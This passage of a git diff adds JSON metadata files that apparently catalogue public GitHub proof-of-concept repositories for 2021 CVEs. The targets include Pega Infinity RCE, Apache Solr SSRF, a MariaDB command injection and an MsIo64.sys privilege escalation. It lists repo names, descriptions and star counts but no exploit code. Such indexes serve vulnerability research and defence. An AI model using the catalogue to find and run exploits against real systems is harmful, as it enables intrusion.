"visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27338.json b/2021/CVE-2021-27338.json new file mode 100644 index 0000000000..587ecad83a --- /dev/null +++ b/2021/CVE-2021-27338.json @@ -0,0 +1,33 @@ +[ + { + "id": 372270842, + "name": "CVE-2021-27338", + "full_name": "Pho03niX\/CVE-2021-27338", + "owner": { + "login": "Pho03niX", + "id": 39918707, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39918707?v=4", + "html_url": "https:\/\/github.com\/Pho03niX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pho03niX\/CVE-2021-27338", + "description": null, + "fork": false, + "created_at": "2021-05-30T17:02:56Z", + "updated_at": "2021-05-30T17:17:06Z", + "pushed_at": "2021-05-30T17:17:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27342.json b/2021/CVE-2021-27342.json new file mode 100644 index 0000000000..3dae4eec40 --- /dev/null +++ b/2021/CVE-2021-27342.json @@ -0,0 +1,33 @@ +[ + { + "id": 367514773, + "name": "D-Link-CVE-2021-27342-exploit", + "full_name": "mavlevin\/D-Link-CVE-2021-27342-exploit", + "owner": { + "login": "mavlevin", + "id": 33753158, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33753158?v=4", + "html_url": "https:\/\/github.com\/mavlevin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mavlevin\/D-Link-CVE-2021-27342-exploit", + "description": "Exploit for CVE-2021-27342 vulnerability (telnet authentication brute-force protection bypass)", + "fork": false, + "created_at": "2021-05-15T01:22:19Z", + "updated_at": "2024-06-21T09:31:49Z", + "pushed_at": "2021-05-15T01:26:07Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27403.json b/2021/CVE-2021-27403.json new file mode 100644 index 0000000000..84b7bb7ade --- /dev/null +++ b/2021/CVE-2021-27403.json @@ -0,0 +1,33 @@ +[ + { + "id": 340105810, + "name": "CVE-2021-27403", + "full_name": "bokanrb\/CVE-2021-27403", + "owner": { + "login": "bokanrb", + "id": 25235094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25235094?v=4", + "html_url": "https:\/\/github.com\/bokanrb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bokanrb\/CVE-2021-27403", + "description": "XSS-Askey", + "fork": false, + "created_at": "2021-02-18T16:14:48Z", + "updated_at": "2024-11-19T15:15:45Z", + "pushed_at": "2021-02-18T17:09:47Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27404.json b/2021/CVE-2021-27404.json new file mode 100644 index 0000000000..d87c8925a8 --- /dev/null +++ b/2021/CVE-2021-27404.json @@ -0,0 +1,33 @@ +[ + { + "id": 340122850, + "name": "CVE-2021-27404", + "full_name": "bokanrb\/CVE-2021-27404", + "owner": { + "login": "bokanrb", + "id": 25235094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25235094?v=4", + "html_url": "https:\/\/github.com\/bokanrb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bokanrb\/CVE-2021-27404", + "description": "HostHeaderInjection-Askey", + "fork": false, + "created_at": "2021-02-18T17:16:39Z", + "updated_at": "2021-08-17T04:59:18Z", + "pushed_at": "2021-02-18T17:20:25Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27513.json b/2021/CVE-2021-27513.json new file mode 100644 index 0000000000..5bd595ca3e --- /dev/null +++ b/2021/CVE-2021-27513.json @@ -0,0 +1,64 @@ +[ + { + "id": 340848423, + "name": "CVE-2021-27513-CVE-2021-27514", + "full_name": "ArianeBlow\/CVE-2021-27513-CVE-2021-27514", + "owner": { + "login": "ArianeBlow", + "id": 61753065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61753065?v=4", + "html_url": "https:\/\/github.com\/ArianeBlow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ArianeBlow\/CVE-2021-27513-CVE-2021-27514", + "description": null, + "fork": false, + "created_at": "2021-02-21T08:00:14Z", + "updated_at": "2021-11-01T10:30:56Z", + "pushed_at": "2021-10-08T13:16:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414991608, + "name": "CVE-2021-27513", + "full_name": "ArianeBlow\/CVE-2021-27513", + "owner": { + "login": "ArianeBlow", + "id": 61753065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61753065?v=4", + "html_url": "https:\/\/github.com\/ArianeBlow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ArianeBlow\/CVE-2021-27513", + "description": "ITSM_Broken_control", + "fork": false, + "created_at": "2021-10-08T13:11:00Z", + "updated_at": "2021-10-08T13:14:24Z", + "pushed_at": "2021-10-08T13:14:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27651.json b/2021/CVE-2021-27651.json new file mode 100644 index 0000000000..f8d9604f52 --- /dev/null +++ b/2021/CVE-2021-27651.json @@ -0,0 +1,99 @@ +[ + { + "id": 367763176, + "name": "CVE-2021-27651-PoC", + "full_name": "samwcyo\/CVE-2021-27651-PoC", + "owner": { + "login": "samwcyo", + "id": 16300489, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16300489?v=4", + "html_url": "https:\/\/github.com\/samwcyo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/samwcyo\/CVE-2021-27651-PoC", + "description": "RCE for Pega Infinity >= 8.2.1, Pega Infinity <= 8.5.2", + "fork": false, + "created_at": "2021-05-16T01:40:47Z", + "updated_at": "2024-10-09T18:12:28Z", + "pushed_at": "2021-05-16T05:54:07Z", + "stargazers_count": 60, + "watchers_count": 60, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 60, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 367973600, + "name": "CVE-2021-27651", + "full_name": "Vulnmachines\/CVE-2021-27651", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/CVE-2021-27651", + "description": "Pega Infinity Password Reset", + "fork": false, + "created_at": "2021-05-16T19:58:31Z", + "updated_at": "2024-08-12T20:13:04Z", + "pushed_at": "2021-12-06T19:04:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414009465, + "name": "CVE-2021-27651", + "full_name": "orangmuda\/CVE-2021-27651", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-27651", + "description": "bypass all stages of the password reset flow", + "fork": false, + "created_at": "2021-10-05T23:33:50Z", + "updated_at": "2024-08-12T20:17:00Z", + "pushed_at": "2021-10-05T23:35:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "code-injection", + "pega", + "remote-code-execution" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27850.json b/2021/CVE-2021-27850.json new file mode 100644 index 0000000000..cd31638bb6 --- /dev/null +++ b/2021/CVE-2021-27850.json @@ -0,0 +1,126 @@ +[ + { + "id": 380253996, + "name": "CVE-2021-27850_POC", + "full_name": "kahla-sec\/CVE-2021-27850_POC", + "owner": { + "login": "kahla-sec", + "id": 53152235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53152235?v=4", + "html_url": "https:\/\/github.com\/kahla-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kahla-sec\/CVE-2021-27850_POC", + "description": "A Proof of concept for CVE-2021-27850 affecting Apache Tapestry and leading to unauthencticated remote code execution.", + "fork": false, + "created_at": "2021-06-25T13:55:41Z", + "updated_at": "2024-09-09T01:12:20Z", + "pushed_at": "2023-01-03T13:46:34Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 380518926, + "name": "CVE-2021-27850_POC", + "full_name": "dorkerdevil\/CVE-2021-27850_POC", + "owner": { + "login": "dorkerdevil", + "id": 15796745, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15796745?v=4", + "html_url": "https:\/\/github.com\/dorkerdevil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dorkerdevil\/CVE-2021-27850_POC", + "description": "A Proof of concept for CVE-2021-27850 affecting Apache Tapestry and leading to unauthencticated remote code execution.", + "fork": false, + "created_at": "2021-06-26T14:16:00Z", + "updated_at": "2024-08-12T20:14:16Z", + "pushed_at": "2021-06-25T14:23:45Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 19, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 19, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 382309693, + "name": "CVE_2021_27850_POC", + "full_name": "Ovi3\/CVE_2021_27850_POC", + "owner": { + "login": "Ovi3", + "id": 29408109, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29408109?v=4", + "html_url": "https:\/\/github.com\/Ovi3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ovi3\/CVE_2021_27850_POC", + "description": "Apache Tapestry CVE-2021-27850 PoC", + "fork": false, + "created_at": "2021-07-02T10:21:58Z", + "updated_at": "2024-06-07T22:14:37Z", + "pushed_at": "2021-07-02T10:22:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 511347007, + "name": "CVE-2021-27850", + "full_name": "novysodope\/CVE-2021-27850", + "owner": { + "login": "novysodope", + "id": 45167857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45167857?v=4", + "html_url": "https:\/\/github.com\/novysodope", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/novysodope\/CVE-2021-27850", + "description": "CVE-2021-27850 ysoserial", + "fork": false, + "created_at": "2022-07-07T01:42:44Z", + "updated_at": "2022-07-07T01:42:44Z", + "pushed_at": "2022-07-07T01:44:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27890.json b/2021/CVE-2021-27890.json new file mode 100644 index 0000000000..371c812825 --- /dev/null +++ b/2021/CVE-2021-27890.json @@ -0,0 +1,33 @@ +[ + { + "id": 351325727, + "name": "Mybb-XSS_SQL_RCE-POC", + "full_name": "xiaopan233\/Mybb-XSS_SQL_RCE-POC", + "owner": { + "login": "xiaopan233", + "id": 32785617, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32785617?v=4", + "html_url": "https:\/\/github.com\/xiaopan233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaopan233\/Mybb-XSS_SQL_RCE-POC", + "description": "Mybb associate CVE-2021-27890 & CVE-2021-27889 to RCE poc", + "fork": false, + "created_at": "2021-03-25T06:00:31Z", + "updated_at": "2023-09-15T05:41:19Z", + "pushed_at": "2021-03-25T06:56:52Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27905.json b/2021/CVE-2021-27905.json new file mode 100644 index 0000000000..f49c3a439d --- /dev/null +++ b/2021/CVE-2021-27905.json @@ -0,0 +1,126 @@ +[ + { + "id": 360109059, + "name": "Solr-SSRF", + "full_name": "Henry4E36\/Solr-SSRF", + "owner": { + "login": "Henry4E36", + "id": 41940481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940481?v=4", + "html_url": "https:\/\/github.com\/Henry4E36", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Henry4E36\/Solr-SSRF", + "description": "Apache Solr SSRF(CVE-2021-27905)", + "fork": false, + "created_at": "2021-04-21T09:27:21Z", + "updated_at": "2024-11-06T11:55:25Z", + "pushed_at": "2021-04-21T10:00:59Z", + "stargazers_count": 68, + "watchers_count": 68, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 68, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 361414198, + "name": "Solr-SSRF", + "full_name": "W2Ning\/Solr-SSRF", + "owner": { + "login": "W2Ning", + "id": 33406415, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33406415?v=4", + "html_url": "https:\/\/github.com\/W2Ning", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W2Ning\/Solr-SSRF", + "description": "CVE-2021-27905", + "fork": false, + "created_at": "2021-04-25T11:50:19Z", + "updated_at": "2021-04-28T16:37:34Z", + "pushed_at": "2021-04-28T16:37:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 394568825, + "name": "CVE-2021-27905", + "full_name": "murataydemir\/CVE-2021-27905", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2021-27905", + "description": "[CVE-2021-27905] Apache Solr ReplicationHandler Server Side Request Forgery (SSRF)", + "fork": false, + "created_at": "2021-08-10T07:49:47Z", + "updated_at": "2024-08-12T20:15:28Z", + "pushed_at": "2021-08-10T08:52:16Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 561105525, + "name": "CVE-2021-27905.POC", + "full_name": "pdelteil\/CVE-2021-27905.POC", + "owner": { + "login": "pdelteil", + "id": 20244863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20244863?v=4", + "html_url": "https:\/\/github.com\/pdelteil", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pdelteil\/CVE-2021-27905.POC", + "description": "POC for LFI related to CVE-2021-27905", + "fork": false, + "created_at": "2022-11-03T00:41:16Z", + "updated_at": "2022-12-29T05:08:43Z", + "pushed_at": "2022-11-17T06:27:55Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27928.json b/2021/CVE-2021-27928.json new file mode 100644 index 0000000000..7b072f6788 --- /dev/null +++ b/2021/CVE-2021-27928.json @@ -0,0 +1,112 @@ +[ + { + "id": 358154501, + "name": "CVE-2021-27928", + "full_name": "Al1ex\/CVE-2021-27928", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-27928", + "description": "CVE-2021-27928 MariaDB\/MySQL-'wsrep provider' 命令注入漏洞", + "fork": false, + "created_at": "2021-04-15T06:40:49Z", + "updated_at": "2024-10-06T15:29:45Z", + "pushed_at": "2023-06-29T15:57:12Z", + "stargazers_count": 60, + "watchers_count": 60, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-27928", + "mariadb" + ], + "visibility": "public", + "forks": 16, + "watchers": 60, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 436588547, + "name": "CVE-2021-27928-POC", + "full_name": "shamo0\/CVE-2021-27928-POC", + "owner": { + "login": "shamo0", + "id": 48299520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48299520?v=4", + "html_url": "https:\/\/github.com\/shamo0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shamo0\/CVE-2021-27928-POC", + "description": "CVE-2021-27928-POC", + "fork": false, + "created_at": "2021-12-09T11:18:26Z", + "updated_at": "2023-03-10T12:11:13Z", + "pushed_at": "2021-12-09T12:05:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "2021", + "27928", + "cve", + "escalation", + "mariadb", + "mysql", + "privilege", + "provider", + "root", + "shell", + "sql", + "wsrep" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 578286043, + "name": "CVE-2021-27928", + "full_name": "LalieA\/CVE-2021-27928", + "owner": { + "login": "LalieA", + "id": 83229713, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83229713?v=4", + "html_url": "https:\/\/github.com\/LalieA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LalieA\/CVE-2021-27928", + "description": "A Proof of Concept for the CVE-2021-27928 flaw exploitation", + "fork": false, + "created_at": "2022-12-14T17:36:38Z", + "updated_at": "2023-09-10T22:57:40Z", + "pushed_at": "2023-09-10T22:57:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27963.json b/2021/CVE-2021-27963.json new file mode 100644 index 0000000000..9b464ba86e --- /dev/null +++ b/2021/CVE-2021-27963.json @@ -0,0 +1,33 @@ +[ + { + "id": 342558842, + "name": "SonLogger-vulns", + "full_name": "erberkan\/SonLogger-vulns", + "owner": { + "login": "erberkan", + "id": 15521812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15521812?v=4", + "html_url": "https:\/\/github.com\/erberkan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/erberkan\/SonLogger-vulns", + "description": "SonLogger Vulns (CVE-2021-27963, CVE-2021-27964)", + "fork": false, + "created_at": "2021-02-26T11:44:04Z", + "updated_at": "2024-08-12T20:10:42Z", + "pushed_at": "2021-03-13T08:39:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-27965.json b/2021/CVE-2021-27965.json new file mode 100644 index 0000000000..b20c63b984 --- /dev/null +++ b/2021/CVE-2021-27965.json @@ -0,0 +1,110 @@ +[ + { + "id": 373502325, + "name": "CVE-2021-27965", + "full_name": "mathisvickie\/CVE-2021-27965", + "owner": { + "login": "mathisvickie", + "id": 60326914, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60326914?v=4", + "html_url": "https:\/\/github.com\/mathisvickie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mathisvickie\/CVE-2021-27965", + "description": "stack based buffer overflow in MsIo64.sys, Proof of Concept Local Privilege Escalation to nt authority\/system", + "fork": false, + "created_at": "2021-06-03T12:39:11Z", + "updated_at": "2024-02-24T11:42:32Z", + "pushed_at": "2021-06-07T13:46:21Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "buffer-overflow", + "cve", + "cve-2021-27965", + "driver", + "exploit", + "kernel", + "kernel-driver", + "local-privilege-escalation", + "msio64", + "poc", + "privilege-escalation", + "proof-of-concept", + "stack-buffer-overflow", + "windows" + ], + "visibility": "public", + "forks": 4, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 423304617, + "name": "CVE-2021-27965", + "full_name": "Jeromeyoung\/CVE-2021-27965", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-27965", + "description": "Proof of concept for CVE-2021-27965 (Stack-based Buffer Overflow)", + "fork": false, + "created_at": "2021-11-01T01:41:37Z", + "updated_at": "2021-11-01T01:41:37Z", + "pushed_at": "2021-10-31T02:39:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 512356900, + "name": "CVE-2021-27965", + "full_name": "fengjixuchui\/CVE-2021-27965", + "owner": { + "login": "fengjixuchui", + "id": 2487206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4", + "html_url": "https:\/\/github.com\/fengjixuchui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fengjixuchui\/CVE-2021-27965", + "description": "The MsIo64.sys driver before 1.1.19.1016 in MSI Dragon Center before 2.0.98.0 has a buffer overflow that allows privilege escalation via a crafted 0x80102040, 0x80102044, 0x80102050, or 0x80102054 IOCTL request.", + "fork": false, + "created_at": "2022-07-10T05:53:36Z", + "updated_at": "2023-07-14T15:06:01Z", + "pushed_at": "2022-07-10T04:23:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-28079.json b/2021/CVE-2021-28079.json new file mode 100644 index 0000000000..315b922dba --- /dev/null +++ b/2021/CVE-2021-28079.json @@ -0,0 +1,39 @@ +[ + { + "id": 423093176, + "name": "CVE-2021-28079", + "full_name": "g33xter\/CVE-2021-28079", + "owner": { + "login": "g33xter", + "id": 8503135, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8503135?v=4", + "html_url": "https:\/\/github.com\/g33xter", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g33xter\/CVE-2021-28079", + "description": "POC Jamovi <=1.6.18 is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered.", + "fork": false, + "created_at": "2021-10-31T08:29:53Z", + "updated_at": "2024-07-25T01:21:00Z", + "pushed_at": "2021-10-31T08:57:19Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-28079", + "electronjs", + "jamovi", + "omv", + "xss-exploitation" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-28164.json b/2021/CVE-2021-28164.json new file mode 100644 index 0000000000..429766b25f --- /dev/null +++ b/2021/CVE-2021-28164.json @@ -0,0 +1,33 @@ +[ + { + "id": 712483356, + "name": "-jettyCVE-2021-28164-", + "full_name": "jammy0903\/-jettyCVE-2021-28164-", + "owner": { + "login": "jammy0903", + "id": 144465258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144465258?v=4", + "html_url": "https:\/\/github.com\/jammy0903", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jammy0903\/-jettyCVE-2021-28164-", + "description": "jetty \/CVE-2021-28164\/분석 및 결과", + "fork": false, + "created_at": "2023-10-31T14:59:29Z", + "updated_at": "2024-10-02T02:00:46Z", + "pushed_at": "2024-09-23T13:59:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-28165.json b/2021/CVE-2021-28165.json new file mode 100644 index 0000000000..b70186c1d8 --- /dev/null +++ b/2021/CVE-2021-28165.json @@ -0,0 +1,64 @@ +[ + { + "id": 713358479, + "name": "CVE-2021-28165", + "full_name": "uthrasri\/CVE-2021-28165", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2021-28165", + "description": null, + "fork": false, + "created_at": "2023-11-02T11:08:06Z", + "updated_at": "2023-11-02T11:10:22Z", + "pushed_at": "2023-11-02T19:13:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 719443987, + "name": "Jetty_v9.4.31_CVE-2021-28165", + "full_name": "hshivhare67\/Jetty_v9.4.31_CVE-2021-28165", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/Jetty_v9.4.31_CVE-2021-28165", + "description": null, + "fork": false, + "created_at": "2023-11-16T07:15:37Z", + "updated_at": "2023-11-16T07:19:45Z", + "pushed_at": "2023-11-16T07:38:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-28310.json b/2021/CVE-2021-28310.json new file mode 100644 index 0000000000..984b0485aa --- /dev/null +++ b/2021/CVE-2021-28310.json @@ -0,0 +1,33 @@ +[ + { + "id": 357800087, + "name": "IOC_for_CVE-2021-28310", + "full_name": "Rafael-Svechinskaya\/IOC_for_CVE-2021-28310", + "owner": { + "login": "Rafael-Svechinskaya", + "id": 82496408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82496408?v=4", + "html_url": "https:\/\/github.com\/Rafael-Svechinskaya", + 